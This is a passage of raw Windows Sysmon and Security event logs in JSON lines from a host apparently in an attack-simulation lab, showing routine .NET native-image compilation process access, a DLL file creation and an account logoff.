{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:22.603\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0442-5F25-0000-001014140C00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:22.603","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0442-5F25-0000-001014140C00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:22.603\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0442-5F25-0000-001014140C00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:22.603","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0442-5F25-0000-001014140C00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220713,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBC073\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xbc073","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:25.572\r\nProcessGuid: {A837DB8D-0442-5F25-0000-001014140C00}\r\nProcessId: 4972\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\136c-0\\WindowsBase.dll\r\nCreationUtcTime: 2020-08-01 05:57:25.572","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:25.572","ProcessGuid":"{A837DB8D-0442-5F25-0000-001014140C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\136c-0\\WindowsBase.dll","CreationUtcTime":"2020-08-01 05:57:25.572","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:25.681\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-00108C190C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:25.681","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-00108C190C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:25.681\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-00108C190C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:25.681","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-00108C190C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:25.681\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-00108C190C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:25.681","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-00108C190C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:25.744\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-0010F31C0C00}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:25.744","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-0010F31C0C00}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:25.744\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-0010F31C0C00}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:25.744","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-0010F31C0C00}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:25.744\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0445-5F25-0000-0010F31C0C00}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:25.744","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0445-5F25-0000-0010F31C0C00}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\